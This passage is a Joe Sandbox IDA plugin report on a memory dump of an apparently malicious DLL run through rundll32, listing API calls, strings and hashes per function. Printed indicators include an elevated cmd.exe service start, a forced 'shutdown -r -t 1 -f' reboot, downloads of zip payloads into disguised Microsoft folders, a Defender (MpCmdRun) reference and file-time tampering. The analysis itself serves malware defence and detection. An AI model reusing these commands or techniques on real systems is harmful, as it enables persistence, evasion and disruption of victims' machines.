                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                              • API String ID: 2701450724-3496071916
                                                                              • Opcode ID: 63f046f7a009c8ab0b0bbb8e2c9942372926870f75b58e2c546eef587e6e0fb5
                                                                              • Instruction ID: f1c4b2b933fb988d1f64a58666d95869928a781c50f45a8b43b81299f507f224
                                                                              • Opcode Fuzzy Hash: 63f046f7a009c8ab0b0bbb8e2c9942372926870f75b58e2c546eef587e6e0fb5
                                                                              • Instruction Fuzzy Hash: 7351F175B80288BFFB10DAA4CC46FAE73BCEB08706F504465BA05E7181F6B5FA449A54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 0465D814: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,048496E1,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 0465D83D
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 04849710
                                                                              • Sleep.KERNEL32(0000001E,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04,0000012C,00000000,0484AD29), ref: 04849717
                                                                                • Part of subcall function 0484A074: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0484A0CC
                                                                                • Part of subcall function 0484991C: Sleep.KERNEL32(00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?,00000000), ref: 04849932
                                                                                • Part of subcall function 0484991C: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0484993E
                                                                                • Part of subcall function 0484991C: Sleep.KERNEL32(0000012C,00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?), ref: 04849948
                                                                              • Sleep.KERNEL32(0000012C,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04,0000012C), ref: 0484975E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep$EnvironmentExecExecuteFileMoveShellVariable
                                                                              • String ID: .exe$MpCmdRun$Nigeria Coaches$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$false1$false2$false3
                                                                              • API String ID: 4165743239-145433689
                                                                              • Opcode ID: eaa59d281b638117c841c586c0724d92a181e4c56a535315a56749b414f3d88f
                                                                              • Instruction ID: 9034bc1e119a41e195d559392d7afa72cd7f60df145029e96b46e287939af6b7
                                                                              • Opcode Fuzzy Hash: eaa59d281b638117c841c586c0724d92a181e4c56a535315a56749b414f3d88f
                                                                              • Instruction Fuzzy Hash: 63514E70A101489FEB10FFA8D88099EB3B5FF89309F504A64E541A7364EB34BE05EB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF,?,?,00000000,00000000,00000000), ref: 0463CCF2
                                                                              • LeaveCriticalSection.KERNEL32(04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF,?,?,00000000,00000000), ref: 0463CD16
                                                                              • LeaveCriticalSection.KERNEL32(04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF,?,?,00000000,00000000), ref: 0463CD25
                                                                              • IsValidLocale.KERNEL32(00000000,00000002,04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF), ref: 0463CD37
                                                                              • EnterCriticalSection.KERNEL32(04863C14,00000000,00000002,04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF), ref: 0463CD94
                                                                              • LeaveCriticalSection.KERNEL32(04863C14,04863C14,00000000,00000002,04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF), ref: 0463CDBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                              • String ID: en-GB,en,en-US,
                                                                              • API String ID: 975949045-3021119265
                                                                              • Opcode ID: 3a8e76b9aa7a967194c172c1b847ed58d8e1aabdbdf876a4893f1ebb3c71f59d
                                                                              • Instruction ID: 026f86523bf882bd8635658effe39fda10881ba68e9a8dd3859fe4865450344d
                                                                              • Opcode Fuzzy Hash: 3a8e76b9aa7a967194c172c1b847ed58d8e1aabdbdf876a4893f1ebb3c71f59d
                                                                              • Instruction Fuzzy Hash: E721C0227002D06BFB11BBB88C516297594DF4470FF50492AF402FB340FAA9BC50EAAA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Control-flow graph 134 for the function at 4640844 (graph image not preserved; legend: Executed / Not Executed). Calls shown in the graph: RaiseException, LoadLibraryA, GetLastError, FreeLibrary, LocalAlloc, GetProcAddress.
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 046408FC
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: 6e140243add38b2312ba84ef068bbfcf1107ef740e330be0578c178ed81885e8
                                                                              • Instruction ID: cc88f255b3154da4e9d853b7777f347c05334d2aae683bcf76c65971273a75ac
                                                                              • Opcode Fuzzy Hash: 6e140243add38b2312ba84ef068bbfcf1107ef740e330be0578c178ed81885e8
                                                                              • Instruction Fuzzy Hash: 1FA16E75A01219DFEF14DFE8C880BAEB7F5EB88310F144529EA05A7380EB74B985CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(00000000,?,?,?,0483BB1B), ref: 04654DAD
                                                                              • GetLastError.KERNEL32(00000000,?,?,?,0483BB1B), ref: 04654E06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesErrorFileLast
                                                                              • String ID: ${
                                                                              • API String ID: 1799206407-4046706400
                                                                              • Opcode ID: e8b005f719849b12b2ca676ba6db869ab08f7b7c44e98e6f74814e3b4c970313
                                                                              • Instruction ID: c9d1aa449e2aec5125a540049085b9dc29f7e91c99f75c6c87c2cf30c8ef3e2c
                                                                              • Opcode Fuzzy Hash: e8b005f719849b12b2ca676ba6db869ab08f7b7c44e98e6f74814e3b4c970313
                                                                              • Instruction Fuzzy Hash: 26018F6130920275EF3524781E86BBD01444FA66A9F280B96EE51AA2F0FE4574C36129
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,0463595E), ref: 04635D82
                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0463595E), ref: 04635D9C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 9f59f84f305f61dcf176302a8ef4664e2572209ecf63ca23fdf7b4f95993f2c1
                                                                              • Instruction ID: 1269a204ee063defb07614cc7c8b8d2d732f3f7e3dc71bb58605c4f4c1b0ca2f
                                                                              • Opcode Fuzzy Hash: 9f59f84f305f61dcf176302a8ef4664e2572209ecf63ca23fdf7b4f95993f2c1
                                                                              • Instruction Fuzzy Hash: 96710731604380AFE715CF28D988B16BBE4EF95316F18866ED4468B392F774F841CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04817D18
                                                                              • IsWindowUnicode.USER32 ref: 04817D2C
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04817D4F
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04817D65
                                                                              • TranslateMessage.USER32 ref: 04817DEA
                                                                              • DispatchMessageW.USER32 ref: 04817DF7
                                                                              • DispatchMessageA.USER32 ref: 04817DFF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                              • String ID:
                                                                              • API String ID: 2190272339-0
                                                                              • Opcode ID: 54e89615bd68571bf928fcffb351ea495805929435bda1f4a430a71865399576
                                                                              • Instruction ID: 2dccaf20415ea8fa8eb4480d8eaf4563231da77e5c001c5d0005068ea8ae9716
                                                                              • Opcode Fuzzy Hash: 54e89615bd68571bf928fcffb351ea495805929435bda1f4a430a71865399576
                                                                              • Instruction Fuzzy Hash: 5421942174434476FB226A280C80B7E96DD4FC2F08F144E1FE692D71A1E6A6B8864796
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0484ADB9
                                                                                • Part of subcall function 04654E34: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654E4A
                                                                                • Part of subcall function 04655804: CreateDirectoryW.KERNEL32(00000000,00000000,?,0484AD80,00000000,0484ADE0), ref: 04655811
                                                                                • Part of subcall function 0484AC78: Sleep.KERNEL32(0000012C,00000000,0484AD29), ref: 0484ACB2
                                                                                • Part of subcall function 0484AC78: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0484ACCF
                                                                                • Part of subcall function 0484AC78: Sleep.KERNEL32(0000012C,0000012C,00000000,0484AD29), ref: 0484AD09
                                                                              Strings
                                                                              • C:\Program Files (x86)\Microsoft.NET\0, xrefs: 0484AD68, 0484AD76
                                                                              • C:\Program Files (x86)\Microsoft.NET\fxrno.zip, xrefs: 0484AD9A
                                                                              • 0D4B54E2510D779321C394431AAB62EC1A00CF5127ACD3831796E365999688CED043E97C733BBBB37C38BB23453C04D002A3186949B40A7C, xrefs: 0484AD8A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileSleep$AttributesCreateDirectoryDownloadMessage
                                                                              • String ID: 0D4B54E2510D779321C394431AAB62EC1A00CF5127ACD3831796E365999688CED043E97C733BBBB37C38BB23453C04D002A3186949B40A7C$C:\Program Files (x86)\Microsoft.NET\0$C:\Program Files (x86)\Microsoft.NET\fxrno.zip
                                                                              • API String ID: 1982375319-4057267018
                                                                              • Opcode ID: 501ccbc4238ca96931e94089bfa8fc4a03c408f5150961b08e66914bab8c0dc1
                                                                              • Instruction ID: 242d465ab1be7ea27b70fbb1f4832c30cfe84b08b74e38a0f7e45c72eabbf1bd
                                                                              • Opcode Fuzzy Hash: 501ccbc4238ca96931e94089bfa8fc4a03c408f5150961b08e66914bab8c0dc1
                                                                              • Instruction Fuzzy Hash: 3311867068060C9FFB14EB64CC41BDE73E4DBC8609F500965E901FF750EA75BD448A69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654E4A
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654E89
                                                                              • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0484AD72,00000000), ref: 04654E94
                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,0484AD72,00000000,0484ADE0), ref: 04654EDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCloseCreateErrorHandleLast
                                                                              • String ID:
                                                                              • API String ID: 2927643983-0
                                                                              • Opcode ID: f6f3a705867429bf134debe3fe08f2cb9bc70fdbabb28322cc5906c8e5be3005
                                                                              • Instruction ID: 9e8f5a23af8a705ae82d73bcc29101149b406f389cd1fa608e69d16ddab85da9
                                                                              • Opcode Fuzzy Hash: f6f3a705867429bf134debe3fe08f2cb9bc70fdbabb28322cc5906c8e5be3005
                                                                              • Instruction Fuzzy Hash: 3211EB3174525469FB3410AC5CC9BBA11448FE2764F2A06A9FE5BF63F0FC94B4C15055
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 04635A1F
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 04635A35
                                                                              • Sleep.KERNEL32(00000000), ref: 04635A63
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 04635A79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetLastError.KERNEL32(00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B011
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B048
                                                                              • SetFileTime.KERNEL32(000000FF,00000000,?,?,00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,0472B075,?,00000000), ref: 0472B066
                                                                              • CloseHandle.KERNEL32(000000FF,0472B0DE,00000000,00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B0B2
                                                                              • SetLastError.KERNEL32(00000000,000000FF,0472B0DE,00000000,00000000,00000000,0472B075,?,00000000,0472B0D7), ref: 0472B0B9
                                                                                • Part of subcall function 0472A678: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0472B0D7,?,?,?), ref: 0472A6BE
                                                                                • Part of subcall function 0472A678: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,0472B0D7,?,?,?), ref: 0472A6D3
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileTime$ErrorLast$CloseCreateHandleLocalSystem
                                                                              • String ID:
                                                                              • API String ID: 4140168353-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04), ref: 046553A4
                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04), ref: 046553B3
                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 046553BB
                                                                              • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 046553D6
                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 046553E4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                              • String ID:
                                                                              • API String ID: 2814369299-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?,00000000), ref: 04849932
                                                                              • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0484993E
                                                                              • Sleep.KERNEL32(0000012C,00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?), ref: 04849948
                                                                              Strings
                                                                              • C:\WINDOWS\system32\shutdown.exe -r -t 1 -f, xrefs: 04849939
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep$Exec
                                                                              • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                                              • API String ID: 1325486322-941748481
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 046397AF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentThread
                                                                              • String ID:
                                                                              • API String ID: 2882836952-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,0465525B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0472B1D8,?,?), ref: 046551C7
                                                                                • Part of subcall function 04653194: GetFileAttributesW.KERNEL32(00000000,00000000,?,00000001), ref: 046531E1
                                                                                • Part of subcall function 04653194: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,00000001), ref: 04653213
                                                                                • Part of subcall function 04653194: CloseHandle.KERNEL32(000000FF,0465325C,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,00000001), ref: 0465324F
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,0465525B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0472B1D8), ref: 04655223
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0465525B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0472B1D8), ref: 0465522C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$CloseCreateErrorHandleLast
                                                                              • String ID:
                                                                              • API String ID: 2006287432-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 04818029
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04818040
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow
                                                                              • String ID:
                                                                              • API String ID: 1378638983-0
                                                                              • Opcode ID: 2a269c2fa989e2044dd54b48c92bc48d4c1d3d603d734d0489112b679d2296c0
                                                                              • Instruction ID: b2e2f82f6c75de33850c5a7e541ff3491450740e0d12ebcb0f2c3fa903ca18f3
                                                                              • Opcode Fuzzy Hash: 2a269c2fa989e2044dd54b48c92bc48d4c1d3d603d734d0489112b679d2296c0
                                                                              • Instruction Fuzzy Hash: F8418430A04248EFDB45EF68C885E9EB7F6EB49704F6149B9E814D7361D734AE40DB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,0463D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0463D786,00000000,?,00000105), ref: 0463D693
                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0463D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0463D786,00000000,?,00000105), ref: 0463D6BB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultLanguage$SystemUser
                                                                              • String ID:
                                                                              • API String ID: 384301227-0
                                                                              • Opcode ID: f69a4ac2a3c48f8fb5733c4f2e4c8d3fdf67d8d6564b16e67b0ba82dce8577b1
                                                                              • Instruction ID: 0f8d58ee0da841aeb7a5e87bc48806598959c7870db16d50c3f04847a4ad3061
                                                                              • Opcode Fuzzy Hash: f69a4ac2a3c48f8fb5733c4f2e4c8d3fdf67d8d6564b16e67b0ba82dce8577b1
                                                                              • Instruction Fuzzy Hash: 4E312B70B002899FEB10EFA8C881AAEB7B5EF4970AF504469D414A7350EBB4BD45CB55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D748
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D799
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName
                                                                              • String ID:
                                                                              • API String ID: 1159719554-0
                                                                              • Opcode ID: 13fe4fba9aa4e3057a3b49b23d0d8f39731d0b90b21c362c80baeb64950b2c4f
                                                                              • Instruction ID: 0a29f50de0e85a11710701d8a25acd9a6c847759d3af27642d34b81fdc719993
                                                                              • Opcode Fuzzy Hash: 13fe4fba9aa4e3057a3b49b23d0d8f39731d0b90b21c362c80baeb64950b2c4f
                                                                              • Instruction Fuzzy Hash: EE117770A4425CAFEB14EB90CC85BDD73B8DB44709F5144BAE508A3290FA706F859E99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: DrivesLogical
                                                                              • String ID:
                                                                              • API String ID: 999431828-0
                                                                              • Opcode ID: e7fbc9642cf121bdaa6b147a93a1cd5dc64ea300f9fb3c47fddf86f19132aa62
                                                                              • Instruction ID: 69e8472d1a2a83af07d14a7d57230a0f115a3c09f6aba70023ab40646f8b3a2d
                                                                              • Opcode Fuzzy Hash: e7fbc9642cf121bdaa6b147a93a1cd5dc64ea300f9fb3c47fddf86f19132aa62
                                                                              • Instruction Fuzzy Hash: 1CF0C2363040218BDB147E7D8D586A973C2DBC0365F09493AEAC1CB394D634BD86C205
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,04637D6A,?,?,?,00000000), ref: 04637D49
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CompareString
                                                                              • String ID:
                                                                              • API String ID: 1825529933-0
                                                                              • Opcode ID: f26618e6b1cee662629e4d0990345c972db9b634970784f732337fffcf5bda52
                                                                              • Instruction ID: b3a4c5fe9ebcbe0270cafbefc767f549f9b5b90b2f8a0e839371f9cf17b5d177
                                                                              • Opcode Fuzzy Hash: f26618e6b1cee662629e4d0990345c972db9b634970784f732337fffcf5bda52
                                                                              • Instruction Fuzzy Hash: FDF0FCB13046C47FEB11EB64CC91D5D73DCDF48606B510475F400D3250F6B57E04A614
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,00000000,?,046C21E0,046E5604,00000000,046E5684,?,?,046C21E0), ref: 04654A0F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 4bac73b08c1af8c863f6998c572e52e16be7ad392155c789269a80909799b2dd
                                                                              • Instruction ID: 07b42ad73adcd745a074de98b7fe0e85e93d0614c3dfd8e6833e7a94c230cb57
                                                                              • Opcode Fuzzy Hash: 4bac73b08c1af8c863f6998c572e52e16be7ad392155c789269a80909799b2dd
                                                                              • Instruction Fuzzy Hash: FEE092B2B401502EF76098ADACD1F0A914ECBA5B79F190635F614FF2C1E568AC0192A8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,046C21E0,046E5599,00000000,046E5684,?,?,046C21E0), ref: 04654A61
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
